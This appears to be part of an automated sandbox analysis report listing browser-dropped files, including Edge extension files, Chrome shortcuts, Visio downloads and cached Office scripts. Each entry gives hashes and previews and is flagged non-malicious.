                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1753
                                                        Entropy (8bit):5.8889033066924155
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_996867651\CRX_INSTALL\content.js

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):9815
                                                        Entropy (8bit):6.1716321262973315
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_996867651\CRX_INSTALL\content_new.js

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):10388
                                                        Entropy (8bit):6.174387413738973
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_996867651\CRX_INSTALL\manifest.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):962
                                                        Entropy (8bit):5.698567446030411
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2693
                                                        Entropy (8bit):4.0108305112472165
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FD3FC7B70F1C3DF46F26927227C3BAC8
                                                        SHA1:66A5AD90B9BBB4FAE1C8DF003E89C9599B09E27F
                                                        SHA-256:9BE6E6C4491EA0935D63DB040195D58D380E2BA6D89B74ED814EAB3CC2628244
                                                        SHA-512:89585CEBDAD39EAA770E83DCD99C4D551D629633B016C47165D0D6FE3FE6D5A014606179B59D38B632E80DAF1F359A4B3B922C84643A199C3D5A84FDF222D435
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I_YiQ....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_YrQ....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V_YrQ....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V_YrQ...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............G.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 09:11:38 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2683
                                                        Entropy (8bit):3.9981854491563524
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:AF76B1A3983BE3CCA7747EA700D76A73
                                                        SHA1:98A56851822B3521F3E3CE57D2C0F9CED5741F03
                                                        SHA-256:977DB217A1C53107757AB6D99C78ED5A78029FB1A245D3583C8D6D818C0DB332
                                                        SHA-512:707BA4F9AB7DE59CA98A084237B5B3F86B74EF86769BC26E059BBA7FB165BE1933E2760A80B622DBC53948A6DF897A16BE88AF959DA0DC672AD1DD5F9FD8A763
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:L..................F.@.. ...$+.,....7%.E}+......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I_YiQ....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_YrQ....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V_YrQ....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V_YrQ...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V_YtQ...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............G.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                        C:\Users\user\Downloads\Drawing 1.vsdx (copy)

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Microsoft Visio 2013+
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BA5ABBDF96C2930FDBA0C5F4518D6D05
                                                        SHA1:14E8CDB1ED5589667EC2A855C8CA3D892D8DCDF9
                                                        SHA-256:D2CAA951649488124AA3DFE84F89931EC77000762AE916AC30D85017A3A03850
                                                        SHA-512:ED9BFAF87B15C1831852D8803A47782C92EFD7399A647B26C093353A122642B61EBEA1E25710A4C61520016698404EEFD6DC96E81DA9B5CC47DD9B1BAB7FC0A8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:PK..........!..8Pu...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TIn.0......].YI.EQ....!}. .Zk..l./.,h.g1r. .3.!).&k]gK.AYS.a> ..a.2UA.g...d!r#ym..d..L..w...A..mBA.1......!...FJ.5.x..s\.....`..5.L.1q....J..c.....J@.${..%..(..k."......5.n..:.0.Z...#lid...9....r...*E......p.^I...O../[*l..V,46+?...6.\z....+........}D.@..a_....R.U..w....w.Xs^S...S[.J.ax..9M.z.....W4.%._.....G......A...`....+A.......Y~K.!...........PK..........!..X.%...^......._rels/.rels ...(............

                                                        C:\Users\user\Downloads\Unconfirmed 210652.crdownload

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Microsoft Visio 2013+
                                                        Category:dropped
                                                        Size (bytes):20340
                                                        Entropy (8bit):7.416097418252232
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BA5ABBDF96C2930FDBA0C5F4518D6D05
                                                        SHA1:14E8CDB1ED5589667EC2A855C8CA3D892D8DCDF9
                                                        SHA-256:D2CAA951649488124AA3DFE84F89931EC77000762AE916AC30D85017A3A03850
                                                        SHA-512:ED9BFAF87B15C1831852D8803A47782C92EFD7399A647B26C093353A122642B61EBEA1E25710A4C61520016698404EEFD6DC96E81DA9B5CC47DD9B1BAB7FC0A8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:PK..........!..8Pu...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TIn.0......].YI.EQ....!}. .Zk..l./.,h.g1r. .3.!).&k]gK.AYS.a> ..a.2UA.g...d!r#ym..d..L..w...A..mBA.1......!...FJ.5.x..s\.....`..5.L.1q....J..c.....J@.${..%..(..k."......5.n..:.0.Z...#lid...9....r...*E......p.^I...O../[*l..V,46+?...6.\z....+........}D.@..a_....R.U..w....w.Xs^S...S[.J.ax..9M.z.....W4.%._.....G......A...`....+A.......Y~K.!...........PK..........!..X.%...^......._rels/.rels ...(............

                                                        C:\Users\user\Downloads\cef197b4-6311-4f00-8218-e8786d13a7d3.tmp

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Microsoft Visio 2013+
                                                        Category:dropped
                                                        Size (bytes):8818
                                                        Entropy (8bit):7.475843788961872
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:13D9840C9E221930C806364A88E6B96F
                                                        SHA1:D3BE9ECB358B7B101D17C98EEA17048291B58FB8
                                                        SHA-256:095C6C21F31499D2C4D3F73BB45AEFD0AB4569A7354C1FFFB8852A411EE84BD4
                                                        SHA-512:92C686591A022027AA618F545507B95ED385D3E2A0531F4DB462FF6926637B80BA1F10875B8670B0F6072CDA7886D8599C46214A4E4F72427ECFCA53D0738AEB
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:PK..........!..8Pu...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TIn.0......].YI.EQ....!}. .Zk..l./.,h.g1r. .3.!).&k]gK.AYS.a> ..a.2UA.g...d!r#ym..d..L..w...A..mBA.1......!...FJ.5.x..s\.....`..5.L.1q....J..c.....J@.${..%..(..k."......5.n..:.0.Z...#lid...9....r...*E......p.^I...O../[*l..V,46+?...6.\z....+........}D.@..a_....R.U..w....w.Xs^S...S[.J.ax..9M.z.....W4.%._.....G......A...`....+A.......Y~K.!...........PK..........!..X.%...^......._rels/.rels ...(............

                                                        Chrome Cache Entry: 336

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):179047
                                                        Entropy (8bit):5.525623647458743
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:EF7071A08A827AA27C96EA5E615ABE1B
                                                        SHA1:259E5CFC5D723F0FB14F65898341D5E905C97272
                                                        SHA-256:CAA79B2EE4B8D02D7E16B57F62F3C9F63496BE673686CF20302F89410430EA51
                                                        SHA-512:7403A842650281334439D39904DA811679B40E7CBFACAFF73FF6F7E28921F5707839E27067C82EA45B1F144EF55A652302203DBF764FDFDB42E8CEA16FB7E4B7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/wise/owl/owl.slim.b75c2de5eee34f898531.js
                                                        Preview:var Microsoft;!function(){"use strict";var t,e,n,o,i={32812:function(t,e,n){n.d(e,{h:function(){return s}});var o=n(13260),i=n(40426),r=n(19665),s=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.value=null,e.hasNext=!1,e.hasCompleted=!1,e}return o.C6(e,t),e.prototype.U=function(e){return this.hasError?(e.error(this.thrownError),r.y.EMPTY):this.hasCompleted&&this.hasNext?(e.next(this.value),e.complete(),r.y.EMPTY):t.prototype.U.call(this,e)},e.prototype.next=function(t){this.hasCompleted||(this.value=t,this.hasNext=!0)},e.prototype.error=function(e){this.hasCompleted||t.prototype.error.call(this,e)},e.prototype.complete=function(){this.hasCompleted=!0,this.hasNext&&t.prototype.next.call(this,this.value),t.prototype.complete.call(this)},e}(i.B7)},39188:function(t,e,n){n.d(e,{t:function(){return s}});var o=n(13260),i=n(40426),r=n(92581),s=function(t){function e(e){var n=t.call(this)||this;return n.N=e,n}return o.C6(e,t),Object.defineProperty(e.prototype,"va

                                                        Chrome Cache Entry: 337

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65308), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):272775
                                                        Entropy (8bit):5.703967581910577
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8D9EDD60E2B6329696B4B416FF6178D2
                                                        SHA1:BDDA8531DA8BFB1031B9F9C03F8B5B26004EDF00
                                                        SHA-256:4E23B6C34FCBDBF7EFD6120B27D65D6D0A74E60F161377D678AD530E7DF10251
                                                        SHA-512:E77682825ACE6FECE7E9F01CC0B938FDCE74C6865A97CAA55751AD946AB5D43F5CD8DA27511496D9495573E2C90435BE781C1DD10F8F54F3EFC19700B7B528D6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_core_start"),function(){var e,t,n,o,r,i={87775:function(e,t,n){"use strict";var o;n.d(t,{f:function(){return o}}),function(e){e.depth0="0 0 0 0 transparent",e.depth4="0 1.6px 3.6px 0 rgba(0, 0, 0, 0.132), 0 0.3px 0.9px 0 rgba(0, 0, 0, 0.108)",e.depth8="0 3.2px 7.2px 0 rgba(0, 0, 0, 0.132), 0 0.6px 1.8px 0 rgba(0, 0, 0, 0.108)",e.depth16="0 6.4px 14.4px 0 rgba(0, 0, 0, 0.132), 0 1.2px 3.6px 0 rgba(0, 0, 0, 0.108)",e.depth64="0 25.6px 57.6px 0 rgba(0, 0, 0, 0.22), 0 4.8px 14.4px 0 rgba(0, 0, 0, 0.18)"}(o||(o={}))},83779:function(e,t,n){"use strict";n.d(t,{I:function(){return c}});var o=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,r=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,i=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,s=/\s+/g,a=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-

                                                        Chrome Cache Entry: 340

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):728459
                                                        Entropy (8bit):5.418217858974969
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:D4C8856DDED49294387275F318B7FB9C
                                                        SHA1:AE56403322BC1E52C33467B03F394E2CA0BB6AEE
                                                        SHA-256:4A781DA7C8D774D0B03E97C2795C5F1D53D7D0698C097A0DAC0F4B40DBC7422A
                                                        SHA-512:7CA9369CF2BCC830ECC42995BF1F054170F693AF45D30B7421FBD3BC969D83509224812EBC799DB8C6C509602277B14AAECDCB7200EE09925E352517C11AAC22
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/h4A781DA7C8D774D0_App_Scripts/es2020/common.min.js
                                                        Preview:"use strict";(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[76],{49150:function(e,t,n){function r(e){for(var t,n=0,r=0,o=e.length;o>=4;++r,o-=4)t=1540483477*(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))+(59797*(t>>>16)<<16),n=1540483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(o){case 3:n^=(255&e.charCodeAt(r+2))<<16;case 2:n^=(255&e.charCodeAt(r+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(r)))+(59797*(n>>>16)<<16)}return(((n=1540483477*(65535&(n^=n>>>13))+(59797*(n>>>16)<<16))^n>>>15)>>>0).toString(36)}n.d(t,{A:function(){return r}})},79912:function(e,t,n){n.d(t,{s:function(){return o}});var r=n(26139);function o(e,t,n){void 0===n&&(n=!0);var o=!1;if(e&&t)if(n)if(e===t)o=!0;else for(o=!1;t;){var i=(0,r.P)(t);if(i===e){o=!0;break}t=i}else e.contains&&(o=e.contains(t));return o}},73390:function(e,t,n){n.d(t,{w:function(){return o}});var

                                                        Chrome Cache Entry: 341

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (42915)
                                                        Category:downloaded
                                                        Size (bytes):211427
                                                        Entropy (8bit):5.527090650906731
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:47A7F90B61230BBB7FBEB2132A8BBD43
                                                        SHA1:40D26F410F6B0A178BD61C06CD90D9EBE541BE0E
                                                        SHA-256:0C23BA55CD8384A6B6EAE1B2BF20E993896AD34873DD5E7112644E86258D9898
                                                        SHA-512:C965500741A12BF6C24BF93C76E8C1D3B0718068186F7C0E6FBF15D507AC734503C8F83108E9EA53A9C58D124EF5DDE548654F2F611265F2BFB807F193AC2A16
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/161821440601_App_Scripts/suiteux-shell/js/suiteux.shell.plus.js
                                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_plus_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["plus"],{77514:function(e,t,n){(t=e.exports=n(70002)(!1)).push([e.id,'.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={display:-ms-flexbox;display:flex;-ms-flex-direction:row;flex-direction:row;border:1px solid hsla(0,0%,100%,0);box-shadow:0 1px 2px 0 rgba(0,0,0,.1);box-sizing:border-box;width:276px;padding-left:0;align-items:flex-start;margin:0 0 17px 16px}html[dir=rtl] .o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={margin-left:0;margin-right:16px}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=:hover{-webkit-box-shadow:0 8px 16px 0 rgba(0,0,0,.1);box-shadow:0 8px 16px 0 rgba(0,0,0,.1)}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=>button{min-width:30px;width:30px;height:36px;paddi

                                                        Chrome Cache Entry: 343

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (47671)
                                                        Category:dropped
                                                        Size (bytes):47672
                                                        Entropy (8bit):5.401921124762015
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B804BCD42117B1BBE45326212AF85105
                                                        SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                        SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                        SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                        Chrome Cache Entry: 344

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                        Category:downloaded
                                                        Size (bytes):1249
                                                        Entropy (8bit):5.242453121762845
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F58515DFE987F7E027C8A71BBC884621
                                                        SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                                        SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                                        SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://alinefrasca.sbs/favicon.ico
                                                        Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px

                                                        Chrome Cache Entry: 345

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (4615)
                                                        Category:downloaded
                                                        Size (bytes):4647
                                                        Entropy (8bit):5.170191496530107
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:20B673F9D2064C78B2CC2C7A7DDBC46D
                                                        SHA1:3CC9E0F095D93B38481BE3D0137741D97C1978C3
                                                        SHA-256:83C5CCAF7404DF012ACED39092D0982EB73E9DC942BCE6991956C7B2F10957D8
